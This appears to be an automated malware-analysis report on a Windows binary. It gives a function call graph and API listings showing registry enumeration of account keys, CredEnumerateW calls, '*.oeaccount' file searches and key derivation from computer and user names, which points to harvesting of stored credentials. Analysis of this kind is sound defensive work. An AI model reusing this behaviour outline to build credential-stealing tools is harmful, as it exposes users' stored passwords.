33272->33245 33274 40d113 TranslateAccelerator 33273->33274 33276 40d145 IsDialogMessage 33273->33276 33277 40d139 IsDialogMessage 33273->33277 33274->33273 33275 40d16d GetMessageA 33274->33275 33275->33272 33275->33274 33276->33275 33278 40d157 TranslateMessage DispatchMessageA 33276->33278 33277->33275 33277->33276 33278->33275 33280 404ac4 GetProcAddress 33279->33280 33281 404aec 33279->33281 33282 404ad4 33280->33282 33283 404add FreeLibrary 33280->33283 33285 404b13 33281->33285 33286 404afc MessageBoxA 33281->33286 33282->33283 33283->33281 33284 404ae8 33283->33284 33284->33281 33285->33230 33286->33230 33288 410d17 LoadLibraryA 33287->33288 33289 410d3c 33287->33289 33288->33289 33290 410d2b GetProcAddress 33288->33290 33289->33232 33290->33289 33292 40cd08 ??2@YAPAXI 33291->33292 33294 40cd26 33292->33294 33295 40cd2d 33292->33295 33362 404025 6 API calls 33294->33362 33297 40cd66 33295->33297 33298 40cd59 DeleteObject 33295->33298 33355 407088 33297->33355 33298->33297 33300 40cd6b 33358 4019b5 33300->33358 33303 4019b5 strncat 33304 40cdbf _mbscpy 33303->33304 33304->33234 33364 407948 free free 33305->33364 33307 407cf7 33310 407a1f malloc memcpy free free 33307->33310 33311 407ddc 33307->33311 33313 407d7a free 33307->33313 33318 407e04 33307->33318 33368 40796e 7 API calls 33307->33368 33369 406f30 33307->33369 33310->33307 33311->33318 33377 407a1f 33311->33377 33313->33307 33365 407a55 33318->33365 33319 407e30 33320 407e57 33319->33320 33321 407e38 33319->33321 33320->33239 33320->33240 33321->33320 33322 407e41 _strcmpi 33321->33322 33322->33320 33322->33321 33383 4097ff 33323->33383 33325 409854 33388 409731 33325->33388 33329 4097ff 3 API calls 33328->33329 33330 409723 33329->33330 33408 40966c 33330->33408 33422 4023b2 33333->33422 33338 40ced3 33511 40cdda 7 API calls 33338->33511 33339 40cece 33343 40cf3f 33339->33343 33463 40c3d0 memset GetModuleFileNameA strrchr 33339->33463 33343->33264 33343->33265 33346 40ceed 33490 40affa 33346->33490 33350->33262 33351->33271 33352->33253 33353->33260 33354->33267 33363 406fc7 memset _mbscpy 33355->33363 33357 40709f CreateFontIndirectA 33357->33300 33359 4019e1 33358->33359 33360 4019c2 strncat 33359->33360 33361 4019e5 memset LoadIconA 33359->33361 33360->33359 33361->33303 33362->33295 33363->33357 33364->33307 33366 407a65 33365->33366 33367 407a5b free 33365->33367 33366->33319 33367->33366 33368->33307 33370 406f37 malloc 33369->33370 33371 406f7d 33369->33371 33373 406f73 33370->33373 33374 406f58 33370->33374 33371->33307 33373->33307 33375 406f6c free 33374->33375 33376 406f5c memcpy 33374->33376 33375->33373 33376->33375 33378 407a38 33377->33378 33379 407a2d free 33377->33379 33381 406f30 3 API calls 33378->33381 33380 407a43 33379->33380 33382 40796e 7 API calls 33380->33382 33381->33380 33382->33318 33399 406f96 GetModuleFileNameA 33383->33399 33385 409805 strrchr 33386 409814 33385->33386 33387 409817 _mbscat 33385->33387 33386->33387 33387->33325 33400 44b090 33388->33400 33393 40930c 3 API calls 33394 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33393->33394 33395 4097c5 LoadStringA 33394->33395 33396 4097db 33395->33396 33396->33395 33398 4097f3 33396->33398 33407 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33396->33407 33398->33245 33399->33385 33401 40973e _mbscpy _mbscpy 33400->33401 33402 40930c 33401->33402 33403 44b090 33402->33403 33404 409319 memset GetPrivateProfileStringA 33403->33404 33405 409374 33404->33405 33406 409364 WritePrivateProfileStringA 33404->33406 33405->33393 33406->33405 33407->33396 33418 406f81 GetFileAttributesA 33408->33418 33410 409675 33411 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33410->33411 33417 4096ee 33410->33417 33419 409278 GetPrivateProfileStringA 33411->33419 33413 4096c9 33420 409278 GetPrivateProfileStringA 33413->33420 33415 4096da 33421 409278 GetPrivateProfileStringA 33415->33421 33417->33246 33418->33410 33419->33413 33420->33415 33421->33417 33513 409c1c 33422->33513 33425 401e69 memset 33552 410dbb 33425->33552 33428 401ec2 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33428->33582 33429 401ed4 33567 406f81 GetFileAttributesA 33429->33567 33432 401ee6 strlen strlen 33434 401f15 33432->33434 33435 401f28 33432->33435 33583 4070e3 strlen _mbscat _mbscpy _mbscat 33434->33583 33568 406f81 GetFileAttributesA 33435->33568 33438 401f35 33569 401c31 33438->33569 33441 401f75 33581 410a9c RegOpenKeyExA 33441->33581 33442 401c31 7 API calls 33442->33441 33444 401f91 33445 402187 33444->33445 33446 401f9c memset 33444->33446 33448 402195 ExpandEnvironmentStringsA 33445->33448 33449 4021a8 _strcmpi 33445->33449 33584 410b62 RegEnumKeyExA 33446->33584 33593 406f81 GetFileAttributesA 33448->33593 33449->33338 33449->33339 33451 40217e RegCloseKey 33451->33445 33452 401fd9 atoi 33453 401fef memset memset sprintf 33452->33453 33461 401fc9 33452->33461 33585 410b1e 33453->33585 33456 402165 33456->33451 33457 402076 memset memset strlen strlen 33457->33461 33458 4070e3 strlen _mbscat _mbscpy _mbscat 33458->33461 33459 4020dd strlen strlen 33459->33461 33460 406f81 GetFileAttributesA 33460->33461 33461->33451 33461->33452 33461->33456 33461->33457 33461->33458 33461->33459 33461->33460 33462 402167 _mbscpy 33461->33462 33592 410b62 RegEnumKeyExA 33461->33592 33462->33451 33464 40c422 33463->33464 33465 40c425 _mbscat _mbscpy _mbscpy 33463->33465 33464->33465 33466 40c49d 33465->33466 33467 40c512 33466->33467 33468 40c502 GetWindowPlacement 33466->33468 33469 40c538 33467->33469 33614 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33467->33614 33468->33467 33607 409b31 33469->33607 33473 40ba28 33474 40ba87 33473->33474 33480 40ba3c 33473->33480 33617 406c62 LoadCursorA SetCursor 33474->33617 33476 40ba8c 33618 410a9c RegOpenKeyExA 33476->33618 33619 404734 33476->33619 33627 4107f1 33476->33627 33630 404785 33476->33630 33633 403c16 33476->33633 33477 40ba43 _mbsicmp 33477->33480 33478 40baa0 33479 407e30 _strcmpi 33478->33479 33483 40bab0 33479->33483 33480->33474 33480->33477 33709 40b5e5 10 API calls 33480->33709 33481 40bafa SetCursor 33481->33346 33483->33481 33484 40baf1 qsort 33483->33484 33484->33481 34070 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33490->34070 33492 40b00e 33493 40b016 33492->33493 33494 40b01f GetStdHandle 33492->33494 34071 406d1a CreateFileA 33493->34071 33496 40b01c 33494->33496 33497 40b035 33496->33497 33498 40b12d 33496->33498 34072 406c62 LoadCursorA SetCursor 33497->34072 34076 406d77 9 API calls 33498->34076 33501 40b136 33512 40c580 28 API calls 33501->33512 33502 40b087 33509 40b0a1 33502->33509 34074 40a699 12 API calls 33502->34074 33503 40b042 33503->33502 33503->33509 34073 40a57c strlen WriteFile 33503->34073 33506 40b0d6 33507 40b116 CloseHandle 33506->33507 33508 40b11f SetCursor 33506->33508 33507->33508 33508->33501 33509->33506 34075 406d77 9 API calls 33509->34075 33511->33339 33512->33343 33525 409a32 33513->33525 33516 409c80 memcpy memcpy 33517 409cda 33516->33517 33517->33516 33518 409d18 ??2@YAPAXI ??2@YAPAXI 33517->33518 33519 408db6 12 API calls 33517->33519 33521 409d54 ??2@YAPAXI 33518->33521 33522 409d8b 33518->33522 33519->33517 33521->33522 33522->33522 33535 409b9c 33522->33535 33524 4023c1 33524->33425 33526 409a44 33525->33526 33527 409a3d ??3@YAXPAX 33525->33527 33528 409a52 33526->33528 33529 409a4b ??3@YAXPAX 33526->33529 33527->33526 33530 409a63 33528->33530 33531 409a5c ??3@YAXPAX 33528->33531 33529->33528 33532 409a83 ??2@YAPAXI ??2@YAPAXI 33530->33532 33533 409a73 ??3@YAXPAX 33530->33533 33534 409a7c ??3@YAXPAX 33530->33534 33531->33530 33532->33516 33533->33534 33534->33532 33536 407a55 free 33535->33536 33537 409ba5 33536->33537 33538 407a55 free 33537->33538 33539 409bad 33538->33539 33540 407a55 free 33539->33540 33541 409bb5 33540->33541 33542 407a55 free 33541->33542 33543 409bbd 33542->33543 33544 407a1f 4 API calls 33543->33544 33545 409bd0 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409bda 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409be4 33548->33549 33550 407a1f 4 API calls 33549->33550 33551 409bee 33550->33551 33551->33524 33553 410d0e 2 API calls 33552->33553 33554 410dca 33553->33554 33555 410dfd memset 33554->33555 33594 4070ae 33554->33594 33557 410e1d 33555->33557 33597 410a9c RegOpenKeyExA 33557->33597 33559 401e9e strlen strlen 33559->33428 33559->33429 33561 410e4a 33562 410e7f _mbscpy 33561->33562 33598 410d3d _mbscpy 33561->33598 33562->33559 33564 410e5b 33599 410add RegQueryValueExA 33564->33599 33566 410e73 RegCloseKey 33566->33562 33567->33432 33568->33438 33600 410a9c RegOpenKeyExA 33569->33600 33571 401c4c 33572 401cad 33571->33572 33601 410add RegQueryValueExA 33571->33601 33572->33441 33572->33442 33574 401c6a 33575 401c71 strchr 33574->33575 33576 401ca4 RegCloseKey 33574->33576 33575->33576 33577 401c85 strchr 33575->33577 33576->33572 33577->33576 33578 401c94 33577->33578 33602 406f06 strlen 33578->33602 33580 401ca1 33580->33576 33581->33444 33582->33429 33583->33435 33584->33461 33605 410a9c RegOpenKeyExA 33585->33605 33587 410b34 33588 410b5d 33587->33588 33606 410add RegQueryValueExA 33587->33606 33588->33461 33590 410b4c RegCloseKey 33590->33588 33592->33461 33593->33449 33595 4070bd GetVersionExA 33594->33595 33596 4070ce 33594->33596 33595->33596 33596->33555 33596->33559 33597->33561 33598->33564 33599->33566 33600->33571 33601->33574 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33580 33605->33587 33606->33590 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33473 33616 409868 SendMessageA 33612->33616 33614->33469 33615->33610 33616->33611 33617->33476 33618->33478 33620 404785 FreeLibrary 33619->33620 33621 40473b LoadLibraryA 33620->33621 33622 40474c GetProcAddress 33621->33622 33623 40476e 33621->33623 33622->33623 33624 404764 33622->33624 33625 404781 33623->33625 33626 404785 FreeLibrary 33623->33626 33624->33623 33625->33478 33626->33625 33628 410807 33627->33628 33629 4107fc FreeLibrary 33627->33629 33628->33478 33629->33628 33631 4047a3 33630->33631 33632 404799 FreeLibrary 33630->33632 33631->33478 33632->33631 33634 4107f1 FreeLibrary 33633->33634 33635 403c30 LoadLibraryA 33634->33635 33636 403c74 33635->33636 33637 403c44 GetProcAddress 33635->33637 33639 4107f1 FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33710 4036e5 33643->33710 33646 4036e5 27 API calls 33647 403c9a 33646->33647 33648 4036e5 27 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 27 API calls 33649->33650 33651 403cae 33650->33651 33722 4085d2 33651->33722 33659 403ce5 33660 403cf7 33659->33660 33906 402bd1 40 API calls 33659->33906 33771 410a9c RegOpenKeyExA 33660->33771 33663 403d0a 33664 403d1c 33663->33664 33907 402bd1 40 API calls 33663->33907 33772 402c5d 33664->33772 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33790 410a9c RegOpenKeyExA 33669->33790 33671 403d51 33672 403d61 33671->33672 33908 402b22 47 API calls 33671->33908 33791 410a9c RegOpenKeyExA 33672->33791 33675 403d87 33676 403d97 33675->33676 33909 402b22 47 API calls 33675->33909 33792 410a9c RegOpenKeyExA 33676->33792 33679 403dbd 33680 403dcd 33679->33680 33910 402b22 47 API calls 33679->33910 33793 410808 33680->33793 33684 404785 FreeLibrary 33685 403de8 33684->33685 33797 402fdb 33685->33797 33688 402fdb 34 API calls 33689 403e00 33688->33689 33813 4032b7 33689->33813 33698 403e3b 33699 403e73 33698->33699 33700 403e46 _mbscpy 33698->33700 33860 40fb00 33699->33860 33912 40f334 334 API calls 33700->33912 33709->33480 33711 4036fb 33710->33711 33714 4037c5 33710->33714 33913 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33711->33913 33713 40370e 33713->33714 33715 403716 strchr 33713->33715 33714->33646 33715->33714 33716 403730 33715->33716 33914 4021b6 memset 33716->33914 33718 40373f _mbscpy _mbscpy strlen 33719 4037a4 _mbscpy 33718->33719 33720 403789 sprintf 33718->33720 33915 4023e5 16 API calls 33719->33915 33720->33719 33723 4085e2 33722->33723 33916 4082cd 11 API calls 33723->33916 33727 408600 33728 403cba 33727->33728 33729 40860b memset 33727->33729 33740 40821d 33728->33740 33919 410b62 RegEnumKeyExA 33729->33919 33731 408637 33732 4086d2 RegCloseKey 33731->33732 33734 40865c memset 33731->33734 33920 410a9c RegOpenKeyExA 33731->33920 33923 410b62 RegEnumKeyExA 33731->33923 33732->33728 33921 410add RegQueryValueExA 33734->33921 33737 408694 33922 40848b 10 API calls 33737->33922 33739 4086ab RegCloseKey 33739->33731 33924 410a9c RegOpenKeyExA 33740->33924 33742 40823f 33743 403cc6 33742->33743 33744 408246 memset 33742->33744 33752 4086e0 33743->33752 33925 410b62 RegEnumKeyExA 33744->33925 33746 4082bf RegCloseKey 33746->33743 33748 40826f 33748->33746 33926 410a9c RegOpenKeyExA 33748->33926 33927 4080ed 11 API calls 33748->33927 33928 410b62 RegEnumKeyExA 33748->33928 33751 4082a2 RegCloseKey 33751->33748 33929 4045db 33752->33929 33755 4088f7 33937 404656 33755->33937 33757 40872d 33757->33755 33759 408737 wcslen 33757->33759 33761 4088ef LocalFree 33759->33761 33767 40876a 33759->33767 33760 40872b CredEnumerateW 33760->33757 33761->33755 33762 40877a wcsncmp 33762->33767 33764 404734 3 API calls 33764->33767 33765 404785 FreeLibrary 33765->33767 33766 408812 memset 33766->33767 33768 40883c memcpy wcschr 33766->33768 33767->33761 33767->33762 33767->33764 33767->33765 33767->33766 33767->33768 33769 4088c3 LocalFree 33767->33769 33940 40466b _mbscpy 33767->33940 33768->33767 33769->33767 33770 410a9c RegOpenKeyExA 33770->33659 33771->33663 33941 410a9c RegOpenKeyExA 33772->33941 33774 402c7a 33775 402da5 33774->33775 33776 402c87 memset 33774->33776 33775->33668 33942 410b62 RegEnumKeyExA 33776->33942 33778 402d9c RegCloseKey 33778->33775 33779 410b1e 3 API calls 33780 402ce4 memset sprintf 33779->33780 33943 410a9c RegOpenKeyExA 33780->33943 33782 402d28 33783 402d3a sprintf 33782->33783 33944 402bd1 40 API calls 33782->33944 33945 410a9c RegOpenKeyExA 33783->33945 33786 402cb2 33786->33778 33786->33779 33789 402d9a 33786->33789 33946 402bd1 40 API calls 33786->33946 33947 410b62 RegEnumKeyExA 33786->33947 33789->33778 33790->33671 33791->33675 33792->33679 33794 410816 33793->33794 33795 4107f1 FreeLibrary 33794->33795 33796 403ddd 33795->33796 33796->33684 33948 410a9c RegOpenKeyExA 33797->33948 33799 402ff9 33800 403006 memset 33799->33800 33801 40312c 33799->33801 33949 410b62 RegEnumKeyExA 33800->33949 33801->33688 33803 403122 RegCloseKey 33803->33801 33804 410b1e 3 API calls 33805 403058 memset sprintf 33804->33805 33950 410a9c RegOpenKeyExA 33805->33950 33807 403033 33807->33803 33807->33804 33808 4030a2 memset 33807->33808 33809 410b62 RegEnumKeyExA 33807->33809 33811 4030f9 RegCloseKey 33807->33811 33952 402db3 26 API calls 33807->33952 33951 410b62 RegEnumKeyExA 33808->33951 33809->33807 33811->33807 33814 4032d5 33813->33814 33815 4033a9 33813->33815 33953 4021b6 memset 33814->33953 33828 4034e4 memset memset 33815->33828 33817 4032e1 33954 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33817->33954 33819 4032ea 33820 4032f8 memset GetPrivateProfileSectionA 33819->33820 33955 4023e5 16 API calls 33819->33955 33820->33815 33825 40332f 33820->33825 33822 40339b strlen 33822->33815 33822->33825 33824 403350 strchr 33824->33825 33825->33815 33825->33822 33956 4021b6 memset 33825->33956 33957 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33825->33957 33958 4023e5 16 API calls 33825->33958 33829 410b1e 3 API calls 33828->33829 33830 40353f 33829->33830 33831 40357f 33830->33831 33832 403546 _mbscpy 33830->33832 33836 403985 33831->33836 33959 406d55 strlen _mbscat 33832->33959 33834 403565 _mbscat 33960 4033f0 19 API calls 33834->33960 33961 40466b _mbscpy 33836->33961 33840 4039aa 33842 4039ff 33840->33842 33962 40f460 memset memset 33840->33962 33983 40f6e2 33840->33983 33999 4038e8 21 API calls 33840->33999 33843 404785 FreeLibrary 33842->33843 33844 403a0b 33843->33844 33845 4037ca memset memset 33844->33845 34007 444551 memset 33845->34007 33848 4038e2 33848->33698 33911 40f334 334 API calls 33848->33911 33850 40382e 33851 406f06 2 API calls 33850->33851 33852 403843 33851->33852 33853 406f06 2 API calls 33852->33853 33854 403855 strchr 33853->33854 33855 403884 _mbscpy 33854->33855 33856 403897 strlen 33854->33856 33857 4038bf _mbscpy 33855->33857 33856->33857 33858 4038a4 sprintf 33856->33858 34019 4023e5 16 API calls 33857->34019 33858->33857 33861 44b090 33860->33861 33862 40fb10 RegOpenKeyExA 33861->33862 33863 403e7f 33862->33863 33864 40fb3b RegOpenKeyExA 33862->33864 33874 40f96c 33863->33874 33865 40fb55 RegQueryValueExA 33864->33865 33866 40fc2d RegCloseKey 33864->33866 33867 40fc23 RegCloseKey 33865->33867 33868 40fb84 33865->33868 33866->33863 33867->33866 33869 404734 3 API calls 33868->33869 33870 40fb91 33869->33870 33870->33867 33871 40fc19 LocalFree 33870->33871 33872 40fbdd memcpy memcpy 33870->33872 33871->33867 34024 40f802 11 API calls 33872->34024 33875 4070ae GetVersionExA 33874->33875 33876 40f98d 33875->33876 33877 4045db 7 API calls 33876->33877 33881 40f9a9 33877->33881 33878 40fae6 33879 404656 FreeLibrary 33878->33879 33880 403e85 33879->33880 33886 4442ea memset 33880->33886 33881->33878 33882 40fa13 memset WideCharToMultiByte 33881->33882 33882->33881 33883 40fa43 _strnicmp 33882->33883 33883->33881 33884 40fa5b WideCharToMultiByte 33883->33884 33884->33881 33885 40fa88 WideCharToMultiByte 33884->33885 33885->33881 33887 410dbb 9 API calls 33886->33887 33888 444329 33887->33888 34025 40759e strlen strlen 33888->34025 33893 410dbb 9 API calls 33894 444350 33893->33894 33895 40759e 3 API calls 33894->33895 33896 44435a 33895->33896 33897 444212 65 API calls 33896->33897 33898 444366 memset memset 33897->33898 33899 410b1e 3 API calls 33898->33899 33900 4443b9 ExpandEnvironmentStringsA strlen 33899->33900 33901 4443f4 _strcmpi 33900->33901 33902 4443e5 33900->33902 33903 403e91 33901->33903 33904 44440c 33901->33904 33902->33901 33903->33478 33905 444212 65 API calls 33904->33905 33905->33903 33906->33660 33907->33664 33908->33672 33909->33676 33910->33680 33911->33698 33912->33699 33913->33713 33914->33718 33915->33714 33917 40841c 33916->33917 33918 410a9c RegOpenKeyExA 33917->33918 33918->33727 33919->33731 33920->33731 33921->33737 33922->33739 33923->33731 33924->33742 33925->33748 33926->33748 33927->33751 33928->33748 33930 404656 FreeLibrary 33929->33930 33931 4045e3 LoadLibraryA 33930->33931 33932 404651 33931->33932 33933 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33931->33933 33932->33755 33932->33757 33932->33760 33934 40463d 33933->33934 33935 404643 33934->33935 33936 404656 FreeLibrary 33934->33936 33935->33932 33936->33932 33938 403cd2 33937->33938 33939 40465c FreeLibrary 33937->33939 33938->33770 33939->33938 33940->33767 33941->33774 33942->33786 33943->33782 33944->33783 33945->33786 33946->33786 33947->33786 33948->33799 33949->33807 33950->33807 33951->33807 33952->33807 33953->33817 33954->33819 33955->33820 33956->33824 33957->33825 33958->33825 33959->33834 33960->33831 33961->33840 34000 4078ba 33962->34000 33965 4078ba _mbsnbcat 33966 40f5a3 RegOpenKeyExA 33965->33966 33967 40f5c3 RegQueryValueExA 33966->33967 33968 40f6d9 33966->33968 33969 40f6d0 RegCloseKey 33967->33969 33970 40f5f0 33967->33970 33968->33840 33969->33968 33970->33969 33971 40f675 33970->33971 34004 40466b _mbscpy 33970->34004 33971->33969 34005 4012ee strlen 33971->34005 33973 40f611 33975 404734 3 API calls 33973->33975 33980 40f616 33975->33980 33976 40f69e RegQueryValueExA 33976->33969 33977 40f6c1 33976->33977 33977->33969 33978 40f66a 33979 404785 FreeLibrary 33978->33979 33979->33971 33980->33978 33981 40f661 LocalFree 33980->33981 33982 40f645 memcpy 33980->33982 33981->33978 33982->33981 34006 40466b _mbscpy 33983->34006 33985 40f6fa 33986 4045db 7 API calls 33985->33986 33987 40f708 33986->33987 33988 40f7e2 33987->33988 33989 404734 3 API calls 33987->33989 33990 404656 FreeLibrary 33988->33990 33994 40f715 33989->33994 33991 40f7f1 33990->33991 33992 404785 FreeLibrary 33991->33992 33993 40f7fc 33992->33993 33993->33840 33994->33988 33995 40f797 WideCharToMultiByte 33994->33995 33996 40f7b8 strlen 33995->33996 33997 40f7d9 LocalFree 33995->33997 33996->33997 33998 40f7c8 _mbscpy 33996->33998 33997->33988 33998->33997 33999->33840 34001 4078e6 34000->34001 34002 4078c7 _mbsnbcat 34001->34002 34003 4078ea 34001->34003 34002->34001 34003->33965 34004->33973 34005->33976 34006->33985 34020 410a9c RegOpenKeyExA 34007->34020 34009 44458b 34010 40381a 34009->34010 34021 410add RegQueryValueExA 34009->34021 34010->33848 34018 4021b6 memset 34010->34018 34012 4445dc RegCloseKey 34012->34010 34013 4445a4 34013->34012 34022 410add RegQueryValueExA 34013->34022 34015 4445c1 34015->34012 34023 444879 30 API calls 34015->34023 34017 4445da 34017->34012 34018->33850 34019->33848 34020->34009 34021->34013 34022->34015 34023->34017 34024->33871 34026 4075c9 34025->34026 34027 4075bb _mbscat 34025->34027 34028 444212 34026->34028 34027->34026 34045 407e9d 34028->34045 34031 44424d 34032 444274 34031->34032 34033 444258 34031->34033 34053 407ef8 34031->34053 34034 407e9d 9 API calls 34032->34034 34066 444196 52 API calls 34033->34066 34041 4442a0 34034->34041 34036 407ef8 9 API calls 34036->34041 34037 4442ce 34063 407f90 34037->34063 34041->34036 34041->34037 34043 444212 65 API calls 34041->34043 34067 407e62 strcmp strcmp 34041->34067 34042 407f90 FindClose 34044 4442e4 34042->34044 34043->34041 34044->33893 34046 407f90 FindClose 34045->34046 34047 407eaa 34046->34047 34048 406f06 2 API calls 34047->34048 34049 407ebd strlen strlen 34048->34049 34050 407ee1 34049->34050 34051 407eea 34049->34051 34068 4070e3 strlen _mbscat _mbscpy _mbscat 34050->34068 34051->34031 34054 407f03 FindFirstFileA 34053->34054 34055 407f24 FindNextFileA 34053->34055 34056 407f3f 34054->34056 34057 407f46 strlen strlen 34055->34057 34058 407f3a 34055->34058 34056->34057 34060 407f7f 34056->34060 34057->34060 34061 407f76 34057->34061 34059 407f90 FindClose 34058->34059 34059->34056 34060->34031 34069 4070e3 strlen _mbscat _mbscpy _mbscat 34061->34069 34064 407fa3 34063->34064 34065 407f99 FindClose 34063->34065 34064->34042 34065->34064 34066->34031 34067->34041 34068->34051 34069->34060 34070->33492 34071->33496 34072->33503 34073->33502 34074->33509 34075->33506 34076->33501 34421 43ffc8 18 API calls 34235 4281cc 15 API calls 34423 4383cc 110 API calls 34236 4275d3 41 API calls 34424 4153d3 22 API calls 34237 444dd7 _XcptFilter 34429 4013de 15 API calls 34431 425115 111 API calls 34432 43f7db 18 API calls 34435 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34239 4335ee 16 API calls 34437 429fef 11 API calls 34240 444deb _exit _c_exit 34438 40bbf0 138 API calls 34243 425115 79 API calls 34442 437ffa 22 API calls 34247 4021ff 14 API calls 34248 43f5fc 149 API calls 34443 40e381 9 API calls 34250 405983 40 API calls 34251 42b186 27 API calls 34252 427d86 76 API calls 34253 403585 20 API calls 34255 42e58e 18 API calls 34258 425115 75 API calls 34260 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34447 434395 16 API calls 34262 441d9c memcmp 34449 43f79b 119 API calls 34263 40c599 43 API calls 34450 426741 87 API calls 34267 4401a6 21 API calls 34269 426da6 memcpy memset memset memcpy 34270 4335a5 15 API calls 34272 4299ab memset memset memcpy memset memset 34273 40b1ab 8 API calls 34455 425115 76 API calls 34459 4113b2 18 API calls 34463 40a3b8 memset sprintf SendMessageA 34077 410bbc 34080 4109cf 34077->34080 34081 4109dc 34080->34081 34082 410a23 memset GetPrivateProfileStringA 34081->34082 34083 4109ea memset 34081->34083 34088 407646 strlen 34082->34088 34093 4075cd sprintf memcpy 34083->34093 34086 410a0c WritePrivateProfileStringA 34087 410a65 34086->34087 34089 40765a 34088->34089 34090 40765c 34088->34090 34089->34087 34092 4076a3 34090->34092 34094 40737c strtoul 34090->34094 34092->34087 34093->34086 34094->34090 34275 40b5bf memset memset _mbsicmp

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                    • memset.MSVCRT ref: 00408343
                                                                                                                                                                                    • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                    • memset.MSVCRT ref: 00408376
                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                    • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                    • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                                                                                                    • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                    • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                    Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                    • String ID: ACD
                                                                                                                                                                                    • API String ID: 379999529-620537770
                                                                                                                                                                                    • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
